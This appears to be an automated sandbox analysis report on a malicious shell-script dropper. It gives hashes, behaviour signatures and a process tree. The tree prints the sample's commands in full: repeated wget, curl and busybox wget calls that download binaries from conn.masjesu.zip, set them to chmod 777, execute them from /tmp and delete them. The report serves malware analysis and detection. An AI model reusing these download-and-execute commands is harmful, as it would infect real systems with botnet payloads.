Analysis
-
max time kernel
96s -
max time network
99s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
-
Size
10KB
-
MD5
b3326e86c6435c58119faa00fd7de1c3
-
SHA1
706ae71f350916adfb672b819c6cca8e1ab5fdc5
-
SHA256
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
-
SHA512
e6eeba93a0d3074d2942fa787cb23d5458e0ead7df8bf5597fd29134ad3ebe1b1e194f62c0117c29e98527b067eea7ae78a44ac9fc7302ef04b873e7585362aa
-
SSDEEP
192:o2tYFkg5W+fWyW5cE9JxKDXgGyW5cEHJxKDXsWkg5W+l:o2tYLo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 979 chmod 993 chmod 824 chmod 853 chmod 944 chmod 986 chmod 888 chmod 923 chmod 909 chmod 916 chmod 937 chmod 972 chmod 746 chmod 773 chmod 895 chmod 902 chmod 965 chmod 860 chmod 867 chmod 809 chmod 874 chmod 726 chmod 799 chmod 930 chmod 733 chmod 881 chmod 951 chmod 958 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 727 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs 734 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 747 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s 775 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 800 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z 810 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF 826 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j 854 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV 861 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH 868 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj 875 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU 882 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr 889 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya 896 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV 903 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH 910 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj 917 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU 924 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr 931 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya 938 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 945 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s 952 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 959 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 966 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs 973 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z 980 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF 987 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j 994 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 962 curl 978 busybox 989 wget 891 wget 915 busybox 929 busybox 948 curl 960 rm 969 curl 730 curl 737 curl 750 wget 906 curl 959 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T 798 busybox 812 wget 863 wget 894 busybox 919 wget 934 curl 936 busybox 964 busybox 729 wget 850 busybox 871 curl 898 wget 905 wget 884 wget 899 curl 901 busybox 983 curl 992 busybox 716 curl 732 busybox 856 wget 920 curl 961 wget 736 wget 859 busybox 912 wget 922 busybox 947 wget 803 curl 878 curl 892 curl 985 busybox 880 busybox 941 curl 950 busybox 703 wget 808 busybox 819 busybox 864 curl 870 wget 957 busybox 968 wget 768 busybox 794 curl 885 curl 913 curl 955 curl 739 busybox 873 busybox 982 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 curl File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z curl File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s curl File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 curl File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 curl File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr curl File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj curl File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj curl File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV curl File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya curl File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 curl File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T curl File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z curl File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV curl File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T curl File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs curl File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF curl File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs curl File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya curl File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j curl File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr curl File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU curl File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j curl File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH curl File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU curl File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH curl File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s curl File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF curl
Processes
-
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh1⤵PID:695
-
/bin/rm/bin/rm bins.sh2⤵PID:697
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:724
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:728
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:729
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:735
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:768
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:779
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:780
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:866
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:887
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:908
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
